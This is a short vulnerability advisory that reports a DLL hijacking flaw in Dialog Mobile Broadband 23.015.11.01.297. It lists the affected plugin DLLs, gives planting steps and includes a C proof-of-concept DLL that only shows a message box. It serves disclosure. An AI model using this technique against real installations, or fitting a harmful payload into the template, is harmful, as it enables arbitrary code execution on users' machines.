Dialog Mobile Broadband 23.015.11.01.297 DLL Hijacking

Dialog Mobile Broadband version 23.015.11.01.297 suffers from a dll hijacking vulnerability.


MD5 | d50ba80bd092d2bcf2040522c57ed047

Vulnerable software ..........................  Dialog Mobile Broadband 23.015.11.01.297

Vulnerability type .............................. DLL hijacking vulnerability

Affected DLL's.................................... CallSrvPlugin.dll , GpsSrvPlugin.dll , CallAppPlugin.dll , CallLogSrvPlugin.dll , WLANPlugin.dll , CallAppPlugin,MDInterface.dll

Vendor url .https://www.dialog.lk

Author..Himash



Product descriptionDialog mobile broad band is a dongle software (3g modem)for accessing internet.

It comes with dialog dongle pre installed.







1. Compile dynamic link library (DLL)

2. Rename to CallSrvPlugin.dll

2. Copy CallSrvPlugin to "C:\Program Files (x86)\Dialog Mobile Broadband"

3. Launch Dialog Mobile Broadband

4. MessageBox executes that verifies the dll hijacking is successful.



Proof of concept Exploit





#include <windows.h>



int dll_hijack()

{

MessageBox(0, "found DLL hijacking vulnerability in dialog mobile broadband by himash", "DLL Message", MB_OK);

return 0;

}



BOOL WINAPI DllMain (

HANDLE hinstDLL,

DWORD fdwReason,

LPVOID lpvReserved)

{



dll_hijack();



return 0;

}




Related Posts